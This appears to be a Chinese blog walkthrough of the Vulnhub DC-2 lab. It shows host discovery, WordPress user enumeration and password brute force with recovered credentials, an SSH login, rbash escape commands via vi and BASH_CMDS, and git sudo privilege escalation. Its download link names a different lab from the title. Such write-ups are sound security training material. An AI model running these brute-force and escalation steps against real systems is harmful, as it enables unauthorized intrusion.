DC-2靶机详解

靶机下载地址

https://www.vulnhub.com/entry/de-ice-s1120,10/

 

72deb7894270c478b1481d786fe82570.png

靶机配置

 

4e947400c1c6e651e08fd03cff6ad5de.png

主机发现

arp-scan -l

 

554257fdba874549294827ef825a2731.png

端口扫描

nmap -sS -Pn -A -p- -n 192.168.229.164

 

05df3c99b59c5324347d358058dba3ee.png

端口利用,访问网页

发现访问失败

http://192.168.229.164

 

0fdb9aff76acfd457947a0d856aae531.png

添加本地/windows/system32/drivers/etc/host

kali:/etc/hosts

echo '192.168.229.164 dc-2' >> /etc/hosts

 

e2bd698a2732be00e2897553de902e4e.png

 

af049f7bd208af21edb97aa70eeaaf31.png

访问dc-2

http://dc-2/

 

14dd7560a1c535452f0d2d0c6280df9c.png

找到flag1,根据提示需要工具cewl提取网页中关键词,生成密码字典

 

5a0cf78aa77a04c3a844874d533bcb82.png

cewl: cewl工具爬取目标网站信息,生成相对应的字典
-w 将输出结果写入到文件中
语法:cewl +url -w +保存于哪个目录或文件

有了密码字典,还需要寻找用户名和登陆页面

由网页可知WordPress,所以我们使用kali中WPscan扫描用户

WPScan是一款强大的WordPress安全扫描工具
        wpscan --url http://example.com
        选项: `--enumerate`:启用特定类型的枚举扫描,如用户、插件和主题。
               `--plugins-detection`:设置插件检测的模式,如默认、被动或侵入式。
                `--detection-mode`:设置扫描的侦测模式,如快速、默认或深度。
               -u 用户
               -p 插件
               -t 主题
wpscan --url http://dc-2 -e u

 

05737c783687b20edec44a9959922eea.png

密码爆破

wpscan --url http://dc-2 --passwords 123.txt

 

b146906fb2fcfdf02c58a8ca1ea19686.png

[SUCCESS] - jerry / adipiscing                                                          
[SUCCESS] - tom / parturient 

目录扫描

python dirsearch.py -u "http://dc-2"

 

f817d115df6b6ec44c207e9b6d76e66e.png

找到登录界面,配合前面的账户密码访问

 

b726cb5c9f978816450d11763265f81d.png

找到了另一个flag

 

d1810b98e8aaa2bb8b583e5f46678ab4.png

GETshell

根据提示,我们去尝试另一个端口ssh连接

发现jerry用户无法登录,我们尝试tom用户

ssh tom@192.168.229.164 -p 7744
密码:parturient

 

bd6f90dae5f8e759ef82d13f6eab6a79.png

提权

发现我们执行的命令被禁止

 

f1aef77ff2f575e8a462aa2c1e7a4081.png

输入compgen -c查看可用命令

compgen -c

 

f7600ba4206b9df524a6cfef7cae67ff.png

其中less和vi都可以查看flag3.txt文件

vi flag3.txt

 

a26969fc9ed02814073867c87a7b3d0d.png

根据flag3提示,我们应该进行提权,切换为jerry用户,但是shell被限制了,于是我们需要绕过rbash,然后设置环境变量,最终成功su jerry



    vi编辑器:

            vi flag3.txt
            :set shell=/bin/sh          #shell需要时系统中原本就有的变量,不能自己捏造变量。
            :shell

 

7de4d39004c53495e759484e6bfb4a99.png

 

276f6da097bd16b6cad8a31e52039de7.png

打开了一个shell(部分功能依旧不可用),进入/home/jerry目录下查看文件flag4.txt

 

6349620ebf424e51bcf7235944f86ec2.png

 

b1133280cfe4356347229108605feab1.png

第一种方法虽然可以查看到flag4,但是依旧无法切换到jerry用户,无法使用可以利用来进行提权的命令,例如flag4中所提示的使用git命令进行提权,所以之后还是需要使用第二种方法去切换到jerry用户,来进行提权到root,所以比较鸡肋

这里建议直接使用第二种方法

第二种方法查看flag4

exit
退出vi的提权模式

 

790e51f172a75a1f7baa72fbf64c6e6d.png

绕过rbash,然后设置环境变量,最终成功su jerry

什么是rbash?它与一般shell的区别在于会限制一些行为,让一些命令无法执行

BASH_CMDS[a]=/bin/sh;a       //把/bin/sh给a                             
/bin/bash
export PATH=$PATH:/bin/        //添加环境变量

 

4c67135d2e5fb16955ad3777a22e287b.png

切换用户

su jerry
密码:adipiscing

 

91124ca8174108cd0044e770c31b7194.png

sudo -l查看提权方式

sudo -l

 

1be9d9bbc88fb78f045fdd32cb418e1f.png

使用git提权,利用网站

https://gtfobins.github.io/#git

 

d3bca3145faa7703e9534071fcd646e8.png

 

b59805963ccbcbd59c20e6c58957c781.png

 

192785ccbc0269d7311713a7269fb723.png

查看是否提权成功

id
whoami

 

e5c1bde5a6569efdd4f62abdb88a84fb.png

提权成功

flag4

 

e6b032cfb6c64060e02880464b14bef7.png

最终flag

 

842d7383a48a9bb69d6107a9b7f16932.png

 

 

 

 

 

 

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值